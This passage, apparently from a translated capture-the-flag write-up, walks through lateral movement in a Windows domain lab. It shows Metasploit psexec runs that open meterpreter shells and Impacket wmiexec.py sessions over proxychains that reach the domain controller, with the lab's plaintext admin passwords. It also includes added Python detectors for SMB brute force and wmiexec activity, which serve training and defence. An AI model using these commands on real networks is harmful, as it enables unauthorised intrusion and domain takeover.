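    # A console logon (type 2) is not SMB and is ignored by the detector.
    ("2023-12-04T10:26:00", 4625, "WIN7", "-", "administrator", 2),
]


def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S")


def detect_smb_bruteforce(events, window=timedelta(seconds=60),
                          fail_threshold=3, success_after=2):
    """Return alerts for failure bursts and for successes that follow failures.

    Thresholds are assumptions for the example; tune them to the lockout policy
    of the domain (a lockout threshold below fail_threshold makes the attacker
    abort, which is exactly what smb_login's ABORT_ON_LOCKOUT watches for).
    """
    recent_fails = defaultdict(deque)   # (source, host, user) -> failure times
    already_alerted = set()
    alerts = []
    for ts, event_id, host, src, user, logon_type in sorted(events, key=lambda e: e[0]):
        if logon_type != 3:             # only network logons are of interest here
            continue
        key = (src, host, user.lower())
        now = parse_ts(ts)
        q = recent_fails[key]
        while q and now - q[0] > window:   # slide the window forward
            q.popleft()
        if event_id == 4625:
            q.append(now)
            if len(q) >= fail_threshold and key not in already_alerted:
                already_alerted.add(key)
                alerts.append({"kind": "brute_force", "source": src, "host": host,
                               "user": user, "failures": len(q), "at": ts})
        elif event_id == 4624:
            if len(q) >= success_after:
                # The pattern that matters most: guessing that ended in a valid logon.
                alerts.append({"kind": "success_after_failures", "source": src,
                               "host": host, "user": user, "failures": len(q), "at": ts})
            q.clear()
    return alerts


def hosts_hit_per_source(alerts):
    """Group alerted hosts by source: one source hitting several hosts is a spray."""
    by_src = defaultdict(set)
    for a in alerts:
        by_src[a["source"]].add(a["host"])
    return {src: sorted(hosts) for src, hosts in by_src.items()}


if __name__ == "__main__":
    found = detect_smb_bruteforce(SAMPLE_EVENTS)
    for a in found:
        print(f'{a["at"]} {a["kind"]:24} {a["source"]} -> {a["host"]} '
              f'user={a["user"]} failures={a["failures"]}')
    print(hosts_hit_per_source(found))
```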

2. psexec
Use the psexec module to attack the internal hosts.

Attack flow for 192.168.93.30

msf6 auxiliary(scanner/smb/smb_login) > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf6 exploit(windows/smb/psexec) > set SMBPass 123qwe!ASD
SMBPass => 123qwe!ASD
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   RHOSTS             192.168.93.30    yes       The target host(s), see https
                                                 ://docs.metasploit.com/docs/u
                                                 sing-metasploit/basics/using-
                                                 metasploit.html
   RPORT              445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTI                   no        Service description to be use
   ON                                            d on target for pretty listin
                                                 g
   SERVICE_DISPLAY_N                   no        The service display name
   AME
   SERVICE_NAME                        no        The service name
   SMBDomain          .                no        The Windows domain to use for
                                                  authentication
   SMBPass            123qwe!ASD       no        The password for the specifie
                                                 d username
   SMBSHARE                            no        The share to connect to, can
                                                 be an admin share (ADMIN$,C$,
                                                 ...) or a normal read/write f
                                                 older share
   SMBUser            administrator    no        The username to authenticate
                                                 as


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thr
                                        ead, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.93.30    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > run

[*] 192.168.93.30:445 - Connecting to the server...
[*] 192.168.93.30:445 - Authenticating to 192.168.93.30:445 as user 'administrator'...
[*] 192.168.93.30:445 - Selecting PowerShell target
[*] 192.168.93.30:445 - Executing the payload...
[+] 192.168.93.30:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.30:4444
[*] Sending stage (200774 bytes) to 192.168.93.30
[*] Meterpreter session 5 opened (192.168.93.100:34678 -> 192.168.93.30:4444 via session 4) at 2023-12-04 10:28:38 +0800

meterpreter >



Locating the domain controller

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/windows/gather/enum_domain

[+] Domain FQDN: test.org
[+] Domain NetBIOS Name: TEST
[+] Domain Controller: WIN-8GA56TNV3MV.test.org (IP: 192.168.93.10)
meterpreter >

The domain controller is 192.168.93.10.

Information gathering

meterpreter > shell
Process 1228 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.


C:\Windows\system32>ipconfig /all
ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : win7
   Primary Dns Suffix  . . . . . . . : test.org
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : test.org

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Bluetooth Device (Personal Area Network)
   Physical Address. . . . . . . . . : 3C-55-76-DC-AB-F6
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-E0-74-2B
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::fcc9:1e77:245c:9cf3%11(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.93.30(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-53-70-00-0C-29-E0-74-2B
   DNS Servers . . . . . . . . . . . : 192.168.93.10
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{9155D380-FF00-44EB-AE88-938EA5D2CAB2}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{A0E4F0B0-B72B-4DC5-8935-EA51628015E2}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   
   
   
C:\Windows\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest

3. wmiexec.py
wmiexec.py is a script from the Impacket toolkit that runs commands on a remote Windows host over WMI (Windows Management Instrumentation). WMI is part of Microsoft's Windows management architecture and is used to manage and monitor system resources and services on local and remote computers.

wmiexec.py gives the user a semi-interactive command shell on the remote computer through WMI. Tools of this kind are also commonly used for system administration, troubleshooting and running tasks remotely, so this activity tends to blend in with ordinary administration.


Attack flow for 192.168.93.20

┌──(root㉿ru)-[/usr/share/doc/python3-impacket/examples]
└─# proxychains4 python3 wmiexec.py 'administrator:123qwe!ASD@192.168.93.20'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.20:445  ...  OK
[*] SMBv2.0 dialect used
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.20:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.20:49154  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : win2008
   Primary Dns Suffix  . . . . . . . : test.org
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : test.org

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-AB-44-EC
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::e9c2:7728:85f1:d04f%10(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.93.20(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-55-47-00-0C-29-AB-44-EC
   DNS Servers . . . . . . . . . . . : 192.168.93.10
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter Local Area Connection* 8:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : isatap.{964D2F17-AE7C-4B46-9E2B-EB123D2EEFEA}
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

C:\>net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest
The command completed with one or more errors.



Attack flow for 192.168.93.10

┌──(root㉿ru)-[/usr/share/doc/python3-impacket/examples]
└─# proxychains python3 wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.10:445  ...  OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.10:49154  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : WIN-8GA56TNV3MV
   Primary Dns Suffix  . . . . . . . : test.org
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : test.org

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-1F-54-D2
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::1fa:2f8:97ac:1160%12(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.93.10(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 301993001
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-57-BB-00-0C-29-1F-54-D2
   DNS Servers . . . . . . . . . . . : ::1
                                       127.0.0.1
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{22AC77BB-4205-4120-89CB-C8F5240403E0}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

C:\>net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt
win2008                  win7
The command completed with one or more errors.

C:\Users\Administrator\Desktop>whoami
test\administrator



OK, with the wmiexec.py script from the impacket package we have compromised the internal hosts win2008 (192.168.93.20) and WIN-8GA56TNV3MV (192.168.93.10).
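Added example, not code from the original post: wmiexec.py runs every command through WMI's Win32_Process.Create as `cmd.exe /Q /c <command> 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1` and reads the output file back over SMB, so on the target each command appears as a cmd.exe child of WmiPrvSE.exe with that command-line shape. The Python below picks those out of constructed process-creation records (Sysmon event 1 / Security 4688 style); the record field names are assumptions about the collector.

```python
"""Spot wmiexec.py-style command execution in process-creation telemetry.

Added example, not from the original post. Impacket's wmiexec.py asks WMI
(Win32_Process.Create) to run each command as
    cmd.exe /Q /c <command> 1> \\127.0.0.1\ADMIN$\__<unix time> 2>&1
and then fetches the output file over SMB. The output file name is fixed for
one wmiexec session, so it doubles as a session identifier. Field names used
below (host, parent, image, cmdline) are assumptions about the log source.
"""
import re

WMIEXEC_RE = re.compile(
    r'^cmd\.exe /Q /c (?P<cmd>.+?) 1> '
    r'\\\\127\.0\.0\.1\\(?P<share>[A-Za-z0-9_$]+)\\(?P<outfile>__\d+\.\d+) 2>&1$'
)

# Constructed process-creation records mirroring the commands run in the lab.
SAMPLE_PROCESS_EVENTS = [
    {"host": "WIN2008", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /Q /c ipconfig /all 1> \\127.0.0.1\ADMIN$\__1701657400.102345 2>&1"},
    {"host": "WIN2008", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /Q /c net user 1> \\127.0.0.1\ADMIN$\__1701657400.102345 2>&1"},
    {"host": "WIN-8GA56TNV3MV", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1701657500.551234 2>&1"},
    # Benign: the WMI provider host spawning an installer, no ADMIN$ redirection.
    {"host": "WIN2008", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\deploy\agent.msi /qn"},
    # Benign: an interactive user running cmd /c from Explorer.
    {"host": "WIN7", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /Q /c dir"},
]


def find_wmiexec(events):
    """Return one finding per process record that matches the wmiexec pattern."""
    findings = []
    for ev in events:
        parent_name = ev["parent"].rsplit("\\", 1)[-1].lower()
        if parent_name != "wmiprvse.exe":       # wmiexec children hang off the WMI host
            continue
        m = WMIEXEC_RE.match(ev["cmdline"])
        if not m:                               # WMI-spawned but not the wmiexec shape
            continue
        findings.append({"host": ev["host"], "command": m.group("cmd"),
                         "share": m.group("share"), "outfile": m.group("outfile")})
    return findings


def sessions(findings):
    """Group commands by (host, output file): one file name marks one wmiexec session."""
    grouped = {}
    for f in findings:
        grouped.setdefault((f["host"], f["outfile"]), []).append(f["command"])
    return grouped


if __name__ == "__main__":
    hits = find_wmiexec(SAMPLE_PROCESS_EVENTS)
    for (host, outfile), cmds in sessions(hits).items():
        print(f"{host}: session {outfile} ran {cmds}")
```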

7. Get the flag

┌──(root㉿ru)-[/usr/share/doc/python3-impacket/examples]
└─# proxychains python3 wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.10:445  ...  OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.10:49154  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is D6DC-065A

 Directory of C:\

08/22/2013  11:52 PM    <DIR>          PerfLogs
10/28/2019  08:44 PM    <DIR>          Program Files
08/22/2013  11:39 PM    <DIR>          Program Files (x86)
10/06/2019  07:14 PM    <DIR>          Users
12/04/2023  11:18 AM    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  52,819,361,792 bytes free

C:\>cd Users
C:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is D6DC-065A

 Directory of C:\Users

10/06/2019  07:14 PM    <DIR>          .
10/06/2019  07:14 PM    <DIR>          ..
10/06/2019  07:14 PM    <DIR>          Administrator
08/22/2013  11:39 PM    <DIR>          Public
               0 File(s)              0 bytes
               4 Dir(s)  52,819,361,792 bytes free

C:\Users>cd Administrator
C:\Users\Administrator>dir
 Volume in drive C has no label.
 Volume Serial Number is D6DC-065A

 Directory of C:\Users\Administrator

10/06/2019  07:14 PM    <DIR>          .
10/06/2019  07:14 PM    <DIR>          ..
10/30/2019  10:12 PM    <DIR>          Contacts
10/31/2019  12:52 AM    <DIR>          Desktop
10/31/2019  12:52 AM    <DIR>          Documents
10/30/2019  10:12 PM    <DIR>          Downloads
10/30/2019  10:12 PM    <DIR>          Favorites
10/30/2019  10:12 PM    <DIR>          Links
10/30/2019  10:12 PM    <DIR>          Music
10/30/2019  10:12 PM    <DIR>          Pictures
10/30/2019  10:12 PM    <DIR>          Saved Games
10/30/2019  10:12 PM    <DIR>          Searches
10/30/2019  10:12 PM    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  52,819,357,696 bytes free

C:\Users\Administrator>cd Documents
C:\Users\Administrator\Documents>dir
 Volume in drive C has no label.
 Volume Serial Number is D6DC-065A

 Directory of C:\Users\Administrator\Documents

10/31/2019  12:52 AM    <DIR>          .
10/31/2019  12:52 AM    <DIR>          ..
10/31/2019  12:53 AM                13 flag.txt
               1 File(s)             13 bytes
               2 Dir(s)  52,819,361,792 bytes free

C:\Users\Administrator\Documents>type flag.txt
this is flag!
C:\Users\Administrator\Documents>


In the end we obtain the important file flag.txt on the domain controller.

Source: https://blog.csdn.net/rx3225968517/article/details/135334668